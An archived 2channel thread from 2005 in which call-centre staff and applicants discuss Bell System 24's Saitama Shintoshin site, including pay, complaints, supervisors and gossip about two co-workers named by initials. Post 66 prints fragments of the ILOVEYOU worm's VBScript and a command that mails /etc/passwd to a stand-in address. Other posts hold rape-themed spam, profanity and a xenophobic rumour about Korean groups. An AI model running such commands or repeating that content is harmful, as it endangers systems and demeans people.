2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ベルシステム24新都心3

1 :FROM名無しさan:2005/06/16(木) 21:11:16
過去スレ
http://school4.2ch.net/test/read.cgi/part/1113655539/
http://school4.2ch.net/test/read.cgi/part/1117404378/

営業時間が18:00までに短縮されたね。
クレームばかりで嫌になったのだろうか。

2 :FROM名無しさan:2005/06/16(木) 21:17:52
白い肌をわしづかみにされ荒々しく肉体を開かれていく女!泣き叫び抵抗しても、容赦なく犯される!!The woman who has white skin in a grab and is opening a body violently! Even if I cry and resist, it's violated mercilessly! !

3 :FROM名無しさan:2005/06/16(木) 21:51:27
3ゲット(*^^*)

4 :FROM名無しさan:2005/06/16(木) 21:55:09
ここでつか?
管理者晒しスレは。。。

5 :FROM名無しさan:2005/06/16(木) 22:43:33
>>1おつかれ
明日登録会行って来ます(池袋)
さいたま市民だから新都心に配属されると良いんだけどw

6 :FROM名無しさan:2005/06/16(木) 23:07:09
>>5
採用決めて新都心チームへ来い来い(*^−^)ノ

7 :FROM名無しさan:2005/06/17(金) 08:00:23
あの二人、来るかな〜(@_@)
どんな顔して話ししたらいいだろぅ、多分他のコムさんも知ってる人多いよね。

8 :FROM名無しさan:2005/06/17(金) 08:22:17
他スレで話題の椰子だよな、IとKだっけ?ウザいから早く辞めて栗。
といいつつこれから出社したらチェックしてしまう.....orz

9 :FROM名無しさan:2005/06/17(金) 11:44:11
>>8
業務終了後でもいいから、居たかどう教えて栗〜。
目が合っても平常心を保てよワラ

10 :FROM名無しさan:2005/06/17(金) 18:32:33
私、見かけませんでしたよ。二人とも。
たまたまかな?どうですか?

11 :FROM名無しさan:2005/06/17(金) 18:39:10
>>5私のときは大宮で登録だったけど、今は池袋なんだ。

>>8
IとKって誰だ?わからない

12 :FROM名無しさan:2005/06/17(金) 20:30:42
【メール】ベルシステム24関東part6【コール】
http://school4.2ch.net/test/read.cgi/part/1116244866/
の336あたりから書いてあるね。あの二人か。
ところで、私はもうやめた身なのだが、
相変わらずクレームが多いのかな。
私がいたときは受けた電話の半数くらいが「申し込み覚えなし」
or「使えない番号があるなんて知らない」というクレームだった。

13 :FROM名無しさan:2005/06/17(金) 20:34:55
みんな頑張ってね

14 :FROM名無しさan:2005/06/17(金) 20:36:01
そうだ、ガンガレ

15 :FROM名無しさan:2005/06/17(金) 21:36:24
Kって…今度宇さん?男女で同じ名字がいるけどどっち!?

16 :FROM名無しさan:2005/06/17(金) 21:39:02
それ以上は逝ってはなりませぬ

17 :FROM名無しさan:2005/06/17(金) 22:01:34
そうかー。逝っちゃマズイか。
誰か感じのイイ管理者とかいる?

18 :FROM名無しさan:2005/06/17(金) 22:50:07
>>17
私はSLDが爽やかでGOOD!かと(*^0^*)b"
っていうか、LDによって言う事違ってたりしませんか?私はこの間、挙手して聞いた事が違っててキレました。某緑ストラップの方ですが(-o-;)

19 :FROM名無しさan:2005/06/18(土) 01:53:22
>>18
そんな事はしょっちゅう。
SVの教育がなってないからね。

20 :FROM名無しさan:2005/06/18(土) 06:29:34
クライアントの方針が決まっていないのも大きな原因だね。
だからある意味適当に方針が決まっていて、
それがコロコロ変わる。なので、それを知らずに間違えて
古い方針を伝えてしまう場合もある。

21 :今更だが関連スレ:2005/06/18(土) 06:30:50
【メール】ベルシステム24関東part6【コール】
http://school4.2ch.net/test/read.cgi/part/1116244866/
【全国統一】ベルシステム24
http://school4.2ch.net/test/read.cgi/part/1115719729/

22 :FROM名無しさan:2005/06/18(土) 07:38:04
>>19
でもね、後で履歴見たら、自分が勝手に誤案内したみたいに書かれていてさ。これじゃ納得出来ないよ(><)管理者の人は受電しないから、挙手してる時の不安感なんて分からないんだよね。ゆっくり歩いて来る人もいるし。

23 :FROM名無しさan:2005/06/18(土) 08:12:27
自分も辞めて良かったかも

24 :FROM名無しさan:2005/06/18(土) 12:59:58
>>11なんかね、大宮近辺の仕事が掲載されてなくて、
赤羽に応募したら池袋にこいっていわれますた。
一応登録完了。連絡は月曜日らしいです。

>>22この会社もそういうSV居るんですか・・・・やっぱSVなんてどこも変わらないか。
今までテレオペやって一番酷い目にあったのはT○JのSV。ここに入ってたわけじゃないんだけどね。
何社かテレマ派遣が集まってるところだったんだけど保留して挙手すると必ずそいつが来るw
で、客の怒りを倍増されて逃げる。そして履歴は勝手に改ざんする。
もうね、うちのSVとか社員があきれ果ててたよ。
あとこのB社も入ってたけど、SVもオペも結構いい人多かったからここにしたのになぁ
やっぱ場所によるのね。


25 :FROM名無しさan:2005/06/18(土) 18:23:47
今日も業務疲れた!
特に何もない一日だったよ。

26 :FROM名無しさan:2005/06/18(土) 19:00:54
カポーいた?

27 :FROM名無しさan:2005/06/18(土) 21:04:49
カポー見ちゃった(*^・^*)みた感じ、上手くいってないのかも…。

28 :FROM名無しさan:2005/06/18(土) 21:22:10
↑IとKでつか?

29 :FROM名無しさan:2005/06/18(土) 21:36:45
>>28
他に居ないっしょ。

30 :FROM名無しさan:2005/06/18(土) 21:51:06
A SVとY SVは?

31 :FROM名無しさan:2005/06/18(土) 22:07:21
マジ!?その二人デキてんの?仕事だけの仲っぽくない?

32 :FROM名無しさan:2005/06/18(土) 22:31:32
札幌120ブースだが、そっちは何ブースあるんだ!教えろ!

33 :FROM名無しさan:2005/06/18(土) 22:43:35
200以上かな??

34 :FROM名無しさan:2005/06/18(土) 22:45:42
200マジか?????????

35 :FROM名無しさan:2005/06/18(土) 22:54:59
うん、マジ!移転や記載変更ブースも含めてだけどサ。
札幌は楽しいか?なんか札幌から来てる管理者も新都心に居るよ。

36 :FROM名無しさan:2005/06/18(土) 23:44:40
I君今日は元気してたかな?

37 :FROM名無しさan:2005/06/18(土) 23:52:01
本人に聞いてみよう!それが最短の方法さ。

38 :FROM名無しさan:2005/06/19(日) 02:22:52
>>35
自分的には楽だな!分かりやすく言えば電話番だからな!
こんな事して金もらっていいのか、疑問におもうよ!
アルバイトだから割り切ってやっているけど、社員だったら血管きれまくりだろうな!
やっている事がいい加減すぎる。対応が悪いからクレームが増える=入電数増加。
そのためにわざとクレーム処理しないのかな、と最近思うようになった。

39 :FROM名無しさan:2005/06/19(日) 18:28:46
つくづく嫌な会社だょ

40 :イレギュラー:2005/06/19(日) 19:42:32
あ〜なんか、みんなの前に出たら緊張するなぁ〜。キ〜〜〜〜!

西川君、西川君 あ〜、西川君が緊張しすぎて気失ってしもうたぁ〜
あっ、そうだ!こうなったら、あれをやるしかない、あるある探検隊や!
ズビズ、ズビズバ、
ハイッ、ハイッ、ハイ、ハイ、ハイッ!

あるある探検隊!
あるある探検隊!
あるある探検隊!
あるある探検隊!

ビックリするほでゴネられる!

あるある探検隊!
あるある探検隊!

あるなぁ〜、西川君。

ある、ある。

何でや、何でやのぉ〜、誰が申し込んだちゅうのぉ〜
ハンコ押してないで、ハンコ!
詐欺やないのぉ〜!詐欺!詐欺やわぁ〜!

こういう、あばちゃんおるなぁ〜。

じゃ〜、次、いこか!

41 :イレギュラー:2005/06/19(日) 19:47:22
あるある探検隊!
あるある探検隊!
あるある探検隊!
あるある探検隊!

おやじが、いきなりぶち切れる!

あるある探検隊!
あるある探検隊!

あるなぁ〜。西川君。
こんなのあるか?松本君。

ある、ある。履歴見てみい。350もあるでぇ〜!
しかも、内容が全て意味不明っ書いてある。

あるんやなぁ〜。松本君。

じゃ〜、次、いこか!


42 :FROM名無しさan:2005/06/19(日) 19:49:47
>>40
西川君ステキ♪
1 ハンコ押してないのに申し込みになる。
2センターに問い合わせるが煮えきらない回答。

3総務省へ相談。

4俺らへしっぺ返しが来る

…まあこんな感じか?

43 :イレギュラー:2005/06/19(日) 19:56:18
あるある探検隊!
あるある探検隊!
あるある探検隊!
あるある探検隊!

エスカレしたのに逃げられる!

あるある探検隊!
あるある探検隊!

あるなぁ〜。西川君。
ある、ある。

上司に代われって言ってます。
なんて言っているの?
こうこう、こう言ってます。
じゃぁ〜、こう言って!
もう、言いました。
じゃぁ〜、こう言って!
それも言いました。
私に変わっても同じ事言うだけだから、もう一回言ってみて!

あるなぁ〜。西川君。
ある、ある。こういうLD。

ハイ、ど〜も、ありがとうございました〜〜〜〜〜〜ぁ!

44 :FROM名無しさan:2005/06/19(日) 22:22:51
あ〜アルアル(笑)

45 :FROM名無しさan:2005/06/19(日) 23:05:15
不倫カポーに触発されて自分も人妻にもて遊ばれたい願望が...ヽ(´` )ノ

46 :FROM名無しさan:2005/06/19(日) 23:33:29
不倫カポーって誰?

47 :FROM名無しさan:2005/06/20(月) 10:39:31
46
前のレス見てみなよ!

48 :FROM名無しさan:2005/06/20(月) 10:44:15
IとKの事ですか?今日はどうでしょう?

49 :FROM名無しさan:2005/06/20(月) 11:41:03
その二人って誰よ??未だに分からないしっ!ヒント頂戴?

50 :FROM名無しさan:2005/06/20(月) 12:30:19
イニシャルで十分なひんとかとオモフが。
これ以上はマズイんでない?
敢えてならIが♂ってか。

51 :FROM名無しさan:2005/06/20(月) 12:32:16
50さん親切ですね。
どっちが既婚者なんでしょうか?

52 :FROM名無しさan:2005/06/20(月) 12:49:05
♀だな
やべっ、これ以上は他の人に任す。

53 :FROM名無しさan:2005/06/20(月) 12:57:38
… △−△
\(#`_´#)
( K )\ / \  ̄├┤ ̄ ∧ 8バンテアガッテマス

54 :FROM名無しさan:2005/06/20(月) 13:00:54
>>52
♂は旦那に訴えられやしないか?
職場の椰子にバレる位だから家庭ではバレバレだろーに。

55 :FROM名無しさan:2005/06/20(月) 17:02:36
新都心いま募集かけてるね
で、楽しい部署はどのセッション?
@制約会社
A精子会社
どっち??
メール蘭で答えてくれ

56 :FROM名無しさan:2005/06/20(月) 17:41:53
どうでもいいけどベルって時給低すぎだよね?
1000円って何だよって思うときがある。
埼玉でもほかの会社は1400円とかだもんね。
登録逝って来よう

57 :FROM名無しさan:2005/06/20(月) 17:56:19
ttp://froma.yahoo.co.jp/s/r/F130010s.jsp?ksjcd=03®u_indx_s_class_cd=1041&re_areakind_cd=
M&re_area_cd=23&re_k_area_cd=M23&sentoukensu=0&__u=1119254179840-3144571128945394378&sid=LIST009&edition_cd=1&area_nm=%8D%E9%8B%CA%8C%A7®u_stl=%83%52%81%5B%83%8B%83%5A%83%93%83%5E%81%5B%81%45%83%65%83%8C%83%7D&st=10&rqmt_id=00672063


58 :FROM名無しさan:2005/06/20(月) 21:31:38
新都心のバイトは割に合ってないですよね!せめて働きやすい内容の仕事だったら安くてもいいけれど。

59 :FROM名無しさan:2005/06/20(月) 22:55:10
なら、割りに合った職場へ逝ってよし。

60 :FROM名無しさan:2005/06/20(月) 23:12:15
ちなみに、LDとかはいくら貰ってるんだろ?希望出したらLDになれたりとかするの?

61 :FROM名無しさan:2005/06/20(月) 23:15:00
希望だけで偉くなれるわきゃねーっしょ。何だって実力社会だよ。まずは下っ端からのスタートだよ、それで頑張って勉強した人は上にいけるのさ。
何所でも同じだけどね、がんがれよ!

62 :FROM名無しさan:2005/06/20(月) 23:26:40
↑てことは、皆コム上がりな訳?
LD採用もあるって聞いたことあるけど。

63 :FROM名無しさan:2005/06/20(月) 23:48:30
最近例のカップル見なくね?
辞めたんか?

64 :FROM名無しさan:2005/06/21(火) 00:08:08
>>63
二人揃って見ないんですか?
愛の逃避行だったら羨ましいなw

65 :FROM名無しさan:2005/06/21(火) 02:07:51
おいおい、2さんの英語めちゃくちゃだし、翻訳ツールバレバレww
Get da fuck outta here son of a bitch, u got bloody fuckin' "english" shitless.
If u tried to write down something to me with truely god damn motherfuckin' correct "english",
I'll give ya somethin',like I'll shave my balls. U know what I mean cocksucker?

66 :FROM名無しさan:2005/06/21(火) 04:18:15
新都心能力テスト
これは何?

c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

67 :FROM名無しさan:2005/06/21(火) 08:39:39
超眠い。今日はシフト入ってるからラフに仕事してくるよ。

68 :FROM名無しさan:2005/06/21(火) 10:12:05
バイト先にかわえー子はおらんかね?

69 :FROM名無しさan:2005/06/21(火) 13:07:10
時給1000円か…迷うな。安くて。仕事は楽かい?

70 :FROM名無しさan:2005/06/21(火) 13:16:31
あ、質問の続き。週5日入る希望すればちゃんと入れてくれるの?

71 :FROM名無しさan:2005/06/21(火) 13:18:54
まじで 電通内で 半島の話 しないほうがいいよ
 ふざけて「これから局にいってくるニダ」とかもダメだよ。

電通社内には「朝鮮総連電通支部青年班」があるという噂。
ミンダン系のサークルもあるとかないとか。これはマジ怖い。
や  ら   れ  る  ぞ!
焼肉に誘われたら怪しいと思え!警戒しろ!


72 :FROM名無しさan:2005/06/21(火) 13:56:59
>>70
シフトカットも普通にあるYO

73 :FROM名無しさan:2005/06/21(火) 15:07:38
時給千円は安くても、勤務中に
寝てたり
下ネタ話したり
ドラえもん書いたり
してる椰子が居るコルセンだから気楽だ。

74 :FROM名無しさan:2005/06/21(火) 15:13:42
>>72-73ありがとう
マジですか。気楽なのは良いけどシフトカットはキツイ
やめとこ。

75 :FROM名無しさan:2005/06/21(火) 15:22:44
うん。実際勤務してる立場からしても奨められるバイトじゃないよ(/_;)

76 :FROM名無しさan:2005/06/21(火) 16:41:17
おっす
オラ明日面接に行くぞ!
ヨロシクな

77 :FROM名無しさan:2005/06/21(火) 17:33:56
>>76
がんがれョ(´▽`)b

78 :FROM名無しさan:2005/06/21(火) 20:06:47
すみません教えてください。
ここって面接したあと何日後に連絡来ますか?
昨日面接したのですが連絡ありません。
やっぱりこれって不採用って事ですよねorz

79 :FROM名無しさan:2005/06/21(火) 21:06:27
↑私の時は二日以内と言われましたよ!

80 :FROM名無しさan:2005/06/21(火) 21:40:20
>>79ありがとうございます
昨日の面接で「明日(今日)からでも研修を受けに来て」と言われていたので
すぐに連絡が来るものだと思ってました。
もうちょっと待ってみます、多分(´Д⊂ モウダメポ


81 :FROM名無しさan:2005/06/21(火) 22:24:01
うん。待ってみなよー(^O^)もし採用決まったら報告キボンヌ♪

82 :FROM名無しさan:2005/06/22(水) 11:18:54
誰かいない?最近カポー話がなくないか?

83 :FROM名無しさan:2005/06/22(水) 19:05:33
偉くなったら研修とかあるの?18時で帰れない?

84 :FROM名無しさan:2005/06/22(水) 21:44:41
>83
18時に帰るのは無理じゃね?

85 :FROM名無しさan:2005/06/22(水) 21:48:30
>>電話受付は18時までですよね?だったら、18時チョイすぎには帰れないですか?
その後残業とか研修とかあるんですか?

86 :FROM名無しさan:2005/06/23(木) 15:30:48


87 :FROM名無しさan:2005/06/23(木) 16:44:25
今リクナビに出てる業務(製薬会社の受信)やってる人居ますか?
働いている人は男女比、年齢どれくらいなんでしょうか?
30過ぎの女が行っても浮かないでしょうか?

88 :FROM名無しさan:2005/06/23(木) 16:59:45
待ち呼多すぎだよー!

89 :FROM名無しさan:2005/06/23(木) 19:21:55
ちょっと教えてほしいんですが
採用が決まったとき、初日に自分で持参するものって
・写真(3X3)
・通帳
・印鑑
・身分証
・筆記用具
その他に何かありますか?


90 :FROM名無しさan:2005/06/23(木) 21:23:24
製薬会社の仕事はまだやってる人いませんよ。研修室だった所を工事してるから。製薬会社でない方の仕事してますがかなり幅広い年齢の方がいるしあんま気にしなくていいんでない?変な人ばっか働いてる会社ですよ〜。

91 :FROM名無しさan:2005/06/23(木) 22:13:08
>>90ありがd
ちょうど短期の仕事探してたし応募してみます

92 :FROM名無しさan:2005/06/23(木) 23:44:52
なんか黒くてデカイ人いるけど、あのテンション何…

93 :FROM名無しさan:2005/06/24(金) 00:06:14
黒くてデカイ.....なんかエチーね

94 :78:2005/06/24(金) 01:36:34
>>81
今日採用連絡キタ━━(゚∀゚)━━ヨ
って、留守電に録音されてたので直接聞いてませんがw
心配したけど大丈夫でした。ありがd

95 :FROM名無しさan:2005/06/24(金) 07:59:30
>>92
黒くてデカイね…。スグわかった。椰子の事だよな?w

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)